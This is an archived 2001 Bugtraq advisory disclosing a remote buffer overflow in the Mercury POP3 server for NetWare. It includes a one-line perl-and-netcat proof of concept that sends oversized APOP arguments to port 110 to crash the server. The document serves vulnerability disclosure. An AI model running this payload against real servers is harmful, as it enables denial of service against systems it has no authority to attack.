[20364] in bugtraq
Mercury for NetWare POP3 server vulnerable to remote buffer
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Sun Apr 22 13:52:30 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <20010421105215.A18021@riget.scene.pl>
Date: Sat, 21 Apr 2001 10:52:15 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
All versions of widely-used POP3 server from Mercury MTA package for Netware
are vulnerable to remote buffer overflow allowing to crash Netware server:
perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110
Remote execution of malicious code is also theoretically possible.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
